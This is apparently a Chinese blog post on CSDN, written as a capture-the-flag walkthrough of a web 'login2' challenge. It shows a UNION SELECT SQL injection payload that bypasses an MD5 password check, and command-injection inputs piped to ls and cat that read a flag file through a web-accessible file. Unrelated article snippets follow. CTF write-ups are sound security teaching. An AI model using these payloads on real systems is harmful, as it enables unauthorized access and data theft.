ctf-WEB-login2(sql注入)_ctf web登录_榴莲蛋挞的博客-程序员秘密

技术标签： ctf web安全安全

题目地址：跳转提示

打开网址，是一个熟悉的登陆页面，几次登录尝试发现报错回显只有一种

应当不是基于布尔的盲注，bp抓包看看：

发现响应中有一串奇怪的字符，尝试使用base64解码，得到：

这应该是一个提示，需要绕过其判断条件

这里就可以利用联合查询来注入（union select)

之前说过，union select后面加数字串时，如果没有后面的表名，则该语句没有向任何一个数据库查询，那么它输出的内容就是select后的数字，并且使用联合查询要求必须保证前后查询的字段数一致，因此要绕过判断条件，可以payload

username=admi' UNION SELECT 1,md5(11)#&password=11，登录成功

这样就相当于：

$sql="SELECT username,password FROM admin WHERE username='admi' UNION SELECT 1,md5(11)";
if (!empty($row) && $row['password']===md5($password)){
}

要注意，提取数据时很可能只取了结果集的第一行数据，所以要保证输入的用户名是错误的，以确保$row['password']===md5(11);

实验了一下上述语句，推测$row的结构如下：

<?php
if($link=mysqli_connect("127.0.0.1","root","root","test")){
	$sql="SELECT username,password FROM admin WHERE username='admi' UNION SELECT 1,md5(11)";
	if($result=mysqli_query($link,$sql)){
		$raw=mysqli_fetch_array($result);
		var_dump($raw);
		mysqli_close($link);
	}else{
		echo mysqli_error;
		die();
	}
}else{
	echo mysqli_connect_error();
	die();
}
?>

果然登录成功：

随便输入ls，发现结果显示使用了grep命令

再输入命令aa | ls>t

访问网站t目录，果然看到了ls结果

于是尝试输入 aa | cat \flag>t

打开t

本文链接：https://blog.csdn.net/god_001/article/details/124736570

原作者删帖不实内容删帖广告或垃圾文章投诉

智能推荐

Python写违章扣分程序_python交通安全答题积分_去抓水母吧的博客-程序员秘密

```pythonprint("="*30)print("序号种类扣分")print("1 酒后驾驶 12")print("2 遮挡车牌 12")print("3 闯红灯 6")print("4 不按道行驶 2")print("="*30)xh=int(input("请输入违章种类序号："))syfz=12print("原始分值为：%d"%(syfz...

平铺数组结构转二维数组区域结构_努力向上长的小小草啊的博客-程序员秘密

/** *平铺数组结构转二维数组区域结构 * 参数：[{"id":51451,"areaCode":310000,"areaName":"上海市","parentCode":0},{"id":51452,"areaCode":310100,"areaName":"上海市","parentCode":310000},{"id":51469,"areaCode":320500,"areaName":"苏州市","parentCode":320000},{"id":51496,"areaCode":31010

UE4 UMG多行文本_tianxiaojie_blog的博客-程序员秘密

widget 中text 单行文本如何变成可以容纳多行文本？修改属性进行调整，需要进行填入文本测试是否符合要求。

前端几种存储方式 - localStorage、sessionStorage_localstorage、sessionstorage等前端存储方案_祁_z的博客-程序员秘密

https://www.cnblogs.com/LuckyWinty/p/5699117.htmlh5之前，存储主要是用cookies。cookies缺点有在请求头上带着数据，大小是4k之内。发送请求cookie会带过去浪费宽度资源。主要应用：购物车、客户登录对于IE浏览器有UserData，大小是64k,只有IE浏览器支持。三种存储方式：localStorage、sessionS...

星星之火OIer：滑雪场高度差题解_滑雪道的高度差怎么算_星星之火OIer的博客-程序员秘密

滑雪场高度差题目出处（2721）这道题是我们编程社考试第四次的第四题，自认为比较水其实吧，这道题是我当时唯一AC的一道题（心酸）也正是因为这道题，我留在了编程社题目大意：有一个M * N（2<=n,m<=500）的滑雪场，每个点都有一个高度，如果相邻两个点的高度差小于安全高度d就可以互相抵达，在滑雪场上有一些重要的点，请问d最小是多少时可以使每个重要的点都可以互相抵...

Oracle使用 expdp/impdp 产生字符集问题导致ORA-02374 ORA-12899 ORA-02372_expdp字符集不同_错过了时间的博客-程序员秘密

使用 expdp/impdp 产生字符集问题导致ORA-02374 ORA-12899 ORA-02372一、故障描述：今天从源数据库expdp导出数据，然后往目标数据库impdp导入的时候，产生如下错误：ORA-02374: conversion error loading table "ACS"."T_DI_NQHQ"ORA-12899: value too large for c...